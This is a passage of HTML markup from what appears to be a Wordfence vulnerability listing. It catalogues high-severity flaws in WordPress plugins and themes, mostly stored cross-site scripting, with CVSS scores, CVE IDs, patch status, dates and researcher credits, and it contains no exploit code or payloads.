<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/moonge" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3134259fccb2cd11ac78ae74096b9b91.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3134259fccb2cd11ac78ae74096b9b91"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/moonge" target="_blank" rel="noopener">moonge</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/51d0ab38-fa5b-4c96-a849-06d6ab3caf2b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ba7ae7c1-a7af-4222-972e-4ca7cfebbb52" target="_blank" rel="noopener">TrueBooker – Appointment Booking and Scheduler System &lt; 1.2.7 &#8211; Unauthenticated Privilege Escalation</a></h4>
<div class="cvss-score-badge">7.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.3 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18776" target="_blank" rel="noopener noreferrer">							CVE-2026-18776						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/truebooker-appointment-booking" target="_blank" rel="noopener">TrueBooker – Appointment Booking and Scheduler System</a> <span class="wfvr-software-slug">[truebooker-appointment-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8f2147d3a162aeba1f2416afc4c0274c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8f2147d3a162aeba1f2416afc4c0274c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem" target="_blank" rel="noopener">Abdullah Kareem</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ba7ae7c1-a7af-4222-972e-4ca7cfebbb52" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/caf5bdc7-8ed9-4b3f-a46d-511f021292a1" target="_blank" rel="noopener">TrueBooker – Appointment Booking and Scheduler System &lt;= 1.2.6 &#8211; Unauthenticated Privilege Escalation</a></h4>
<div class="cvss-score-badge">7.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.3 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73347" target="_blank" rel="noopener noreferrer">							CVE-2026-73347						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/truebooker-appointment-booking" target="_blank" rel="noopener">TrueBooker – Appointment Booking and Scheduler System</a> <span class="wfvr-software-slug">[truebooker-appointment-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem-cyberkareem" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4f2a3b32ba525d9a6cd33a222b91f5ec.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4f2a3b32ba525d9a6cd33a222b91f5ec"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem-cyberkareem" target="_blank" rel="noopener">Abdullah Kareem &#8220;cyberkareem&#8221;</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/caf5bdc7-8ed9-4b3f-a46d-511f021292a1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/625ff95c-932c-42df-84fc-e1d9b430d3b6" target="_blank" rel="noopener">12 Step Meeting List &lt;= 3.19.16 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66584" target="_blank" rel="noopener noreferrer">							CVE-2026-66584						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/12-step-meeting-list" target="_blank" rel="noopener">12 Step Meeting List</a> <span class="wfvr-software-slug">[12-step-meeting-list]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/v1t" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/efd10eb3421a6ca0a3d855ad7029a801.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="efd10eb3421a6ca0a3d855ad7029a801"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/v1t" target="_blank" rel="noopener">V1T</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/625ff95c-932c-42df-84fc-e1d9b430d3b6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5c3ae3c5-831c-4fc3-8d8f-55ac74159b96" target="_blank" rel="noopener">Advance Product Search- Voice &amp; Ajax Search for WooCommerce &lt;= 1.4.8 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66607" target="_blank" rel="noopener noreferrer">							CVE-2026-66607						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/th-advance-product-search" target="_blank" rel="noopener">Advance Product Search- Voice &amp; Ajax Search for WooCommerce</a> <span class="wfvr-software-slug">[th-advance-product-search]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sequence-x0" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4a36854ce1b3d726839f26041f205bdd.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4a36854ce1b3d726839f26041f205bdd"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sequence-x0" target="_blank" rel="noopener">sequence_X0</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5c3ae3c5-831c-4fc3-8d8f-55ac74159b96" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7ab83559-752f-4e6d-b8b2-e312a98516b4" target="_blank" rel="noopener">Affiliates Manager &lt;= 2.9.53 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73358" target="_blank" rel="noopener noreferrer">							CVE-2026-73358						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/affiliates-manager" target="_blank" rel="noopener">Affiliates Manager</a> <span class="wfvr-software-slug">[affiliates-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/20kilograma" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/355ce104d8d84334b00aeb894b98d99d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="355ce104d8d84334b00aeb894b98d99d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/20kilograma" target="_blank" rel="noopener">20kilograma</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7ab83559-752f-4e6d-b8b2-e312a98516b4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/01d62f2c-bfa0-4800-ae20-0c6038a03b3b" target="_blank" rel="noopener">All-in-One WP Migration and Backup &lt; 7.108 &#8211; Authenticated (Administrator+) Remote Code Execution</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17533" target="_blank" rel="noopener noreferrer">							CVE-2026-17533						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/all-in-one-wp-migration" target="_blank" rel="noopener">All-in-One WP Migration and Backup</a> <span class="wfvr-software-slug">[all-in-one-wp-migration]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mohamed-bassia" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3331f826b98deefc61fd596574a03f71.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3331f826b98deefc61fd596574a03f71"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mohamed-bassia" target="_blank" rel="noopener">Mohamed Bassia</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/01d62f2c-bfa0-4800-ae20-0c6038a03b3b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4b02d76b-9c9d-4ed7-964f-657ad59ba4b1" target="_blank" rel="noopener">Aora &#8211; Home &amp; Lifestyle Elementor WooCommerce Theme &lt;= 1.3.19 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66612" target="_blank" rel="noopener noreferrer">							CVE-2026-66612						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/aora" target="_blank" rel="noopener">Aora &#8211; Home &amp; Lifestyle Elementor WooCommerce Theme</a> <span class="wfvr-software-slug">[aora]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/son-bach" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/56906fe372fd1538941e0819ed72361d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="56906fe372fd1538941e0819ed72361d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/son-bach" target="_blank" rel="noopener">Son Bach</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/lan-vy" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/040df00806bcfe4e3cd618b0f25d949e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="040df00806bcfe4e3cd618b0f25d949e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/lan-vy" target="_blank" rel="noopener">Lan Vy</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4b02d76b-9c9d-4ed7-964f-657ad59ba4b1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/94827865-0c1b-4bdc-8562-d2559a0d56ac" target="_blank" rel="noopener">Autopay &lt;= 5.0.0 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73338" target="_blank" rel="noopener noreferrer">							CVE-2026-73338						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/platnosci-online-blue-media" target="_blank" rel="noopener">Autopay</a> <span class="wfvr-software-slug">[platnosci-online-blue-media]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/parkhyunwoo" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f005c4dc82929a63b828a2192c5e7c02.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f005c4dc82929a63b828a2192c5e7c02"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/parkhyunwoo" target="_blank" rel="noopener">ParkHyunWoo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/94827865-0c1b-4bdc-8562-d2559a0d56ac" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a6e3d62c-c959-4352-bec7-57855c4f4547" target="_blank" rel="noopener">B2Bking &lt;= 5.6.07 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66598" target="_blank" rel="noopener noreferrer">							CVE-2026-66598						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/b2bking" target="_blank" rel="noopener">B2Bking</a> <span class="wfvr-software-slug">[b2bking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a6e3d62c-c959-4352-bec7-57855c4f4547" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/404aeb60-28f1-4a91-ba00-89909c943772" target="_blank" rel="noopener">BBQ Pro &lt;= 3.9 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73182" target="_blank" rel="noopener noreferrer">							CVE-2026-73182						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bbq-pro" target="_blank" rel="noopener">BBQ Pro</a> <span class="wfvr-software-slug">[bbq-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/404aeb60-28f1-4a91-ba00-89909c943772" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b7034792-4e5e-4745-a873-3c4ef854a65e" target="_blank" rel="noopener">Better Messages – Chat Rooms, Group Chat, Private Messages &amp; AI Chat Bots &lt;= 2.15.22 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-32547" target="_blank" rel="noopener noreferrer">							CVE-2026-32547						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bp-better-messages" target="_blank" rel="noopener">Better Messages – Chat Rooms, Group Chat, Private Messages &amp; AI Chat Bots</a> <span class="wfvr-software-slug">[bp-better-messages]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b7034792-4e5e-4745-a873-3c4ef854a65e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/abbeb5c9-930b-4786-81da-133d10f54900" target="_blank" rel="noopener">Booking calendar, Appointment Booking System &lt;= 3.2.36 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14334" target="_blank" rel="noopener noreferrer">							CVE-2026-14334						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/booking-calendar" target="_blank" rel="noopener">Booking calendar, Appointment Booking System</a> <span class="wfvr-software-slug">[booking-calendar]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/samdup-choephel" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/87a81a6ad2a6d6d3b21b6794a7d7ef57.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="87a81a6ad2a6d6d3b21b6794a7d7ef57"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/samdup-choephel" target="_blank" rel="noopener">Samdup Choephel</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/abbeb5c9-930b-4786-81da-133d10f54900" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/59833e1f-abb5-453d-ac8d-352ebe0f11df" target="_blank" rel="noopener">Contact Form by Supsystic &lt; 1.10.0 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73378" target="_blank" rel="noopener noreferrer">							CVE-2026-73378						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contact-form-by-supsystic" target="_blank" rel="noopener">Contact Form by Supsystic</a> <span class="wfvr-software-slug">[contact-form-by-supsystic]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/asim-alshaya" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f1f186a43626c61a7e05b5db4a89b87d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f1f186a43626c61a7e05b5db4a89b87d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/asim-alshaya" target="_blank" rel="noopener">Asim Alshaya</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/59833e1f-abb5-453d-ac8d-352ebe0f11df" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d1f308cc-2ea9-4c67-9c1b-4f2e4676b2c2" target="_blank" rel="noopener">Contest Gallery – Upload &amp; Vote Photos, Media, Sell with PayPal &amp; Stripe &lt;= 30.0.5 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61986" target="_blank" rel="noopener noreferrer">							CVE-2026-61986						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
